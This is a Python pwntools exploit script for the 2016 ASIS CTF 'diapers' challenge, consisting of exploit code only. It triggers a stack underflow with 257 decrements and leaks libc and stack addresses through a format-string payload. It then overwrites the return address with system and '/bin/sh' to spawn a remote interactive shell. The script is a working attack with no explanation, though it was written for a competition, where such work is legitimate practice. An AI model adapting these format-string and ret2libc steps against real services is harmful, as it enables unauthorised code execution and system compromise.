2016 ASIS CTF diapers(exploit only)

from pwn import *
import stitch

local = False
if local :
	s = remote('localhost', 9988)
else :
	s = remote('diapers.asis-ctf.ir', 1343)
raw_input()

def main() :
	strip_ = lambda x : x.strip('0x')
	p = log.progress('start pwning....')
	p.status('select first')

	#to stack underflow
	s.recvuntil('> ')
	s.sendline('3')

	for _ in range(257) :
		p.status('%dth minus'%(_+1))
		s.recvuntil('> ')
		sleep(0.1)
		s.sendline('1')

	#find memory addr
	p.status('leak libc and stack')
	s.recvuntil('> ')
	s.sendline('0')
	s.recvuntil('change to: ')

	pay = 'a' * 15
	pay += '#%55$p#%6$p#'
	pay += 'A' * (108 - len(pay))
	s.sendline(pay)

	s.recvuntil('> ')
	s.sendline('2')
	libc_leak, ret_addr = map(strip_, s.recvuntil('> ').split('#')[1:3])
	ret_addr = int(ret_addr, 16) - 156

	#find func addr
	p.status('find system and binsh')
	libc = stitch.find_libc({'main_ret':libc_leak[-3:]})[0]
	offset = int(libc_leak, 16) - libc['main_ret']
	system = offset + libc['system']
	binsh = offset + libc['binsh']

	#memory overwrite
	p.status('overwrite memory')
	s.sendline('0')
	s.recvuntil('change to: ')

	pay = 'A' * 15
	pay += stitch.fsb(18,{ret_addr:system, ret_addr+8:binsh}, 0)
	pay += 'A' * (108 - len(pay))
	s.sendline(pay)

	s.recvuntil('> ')
	s.sendline('2')

	#success
	p.success('Good!')
	log.success('Get shell!!')
	s.interactive()

if __name__ == '__main__' :
	main()